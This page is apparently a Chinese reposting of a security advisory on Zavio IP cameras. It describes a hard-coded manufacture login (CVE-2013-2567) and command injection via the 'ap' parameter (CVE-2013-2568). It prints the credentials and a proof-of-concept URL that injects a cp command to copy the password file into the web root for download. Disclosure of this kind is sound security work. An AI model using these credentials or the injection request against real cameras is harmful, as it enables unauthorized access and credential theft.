Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Zavio IP Cameras 任意命令注入漏洞(CVE-2013-2568)

发布日期:2013-05-28
更新日期:2013-05-29受影响系统:
Zavio Zavio IP Cameras <= 1.6.03
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60190
 CVE(CAN) ID: CVE-2013-2568
 
Zavio IP Cameras是网络摄像机产品。
 
Zavio IP Cameras在文件"/cgi-bin/mft/wireless_mft.cgi"的参数"ap"中存在OS命令注入,通过硬编码凭证可导致OS命令注入。
 
<*来源:Nahuel Riva
       Francisco Falcon
 
 链接:http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/89865?page=last
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
摘录自
 http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities
 
[CVE-2013-2567] 硬编码的可访问管理界面的用户名和密码
 配置文件"boa.conf"中含有硬编码的用户名和密码,可通过该用户名和密码访问"/cgi-bin/mft/"的CGI文件("manufacture.cgi"和"wireless_mft.cgi")。
 其中"wireless_mft.cgi"包含一个命令注入漏洞(CVE-2013-2568)
 
/-----
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
-----/
[CVE-2013-2568] 命令注入漏洞
 "/cgi-bin/mft/wireless_mft.cgi"对"ap"参数验证不严而导致命令注入漏洞。
 
下面poc演示如何获取用户的凭证信息
 
step1. 使用前述硬编码的用户名(manufacture)和密码(erutcafunam)访问"/cgi-bin/mft/wireless_mft.cgi";
 stpe2. 构造恶意"ap"参数值来执行cp命令,拷贝私密文件;
 step3. 访问私密文件.
 
step2.
 /-----
http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales
-----/step3.
Afterwards, the user credentials can be obtained by requesting:
/-----
http://192.168.1.100/credenciales
-----/建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Zavio
 -----
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.zavio.com/ModSecurity 的拒绝服务漏洞已修复Apache Tomcat DIGEST Authentication重放攻击漏洞(CVE-2013-2051)相关资讯      Zavio IP Cameras  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容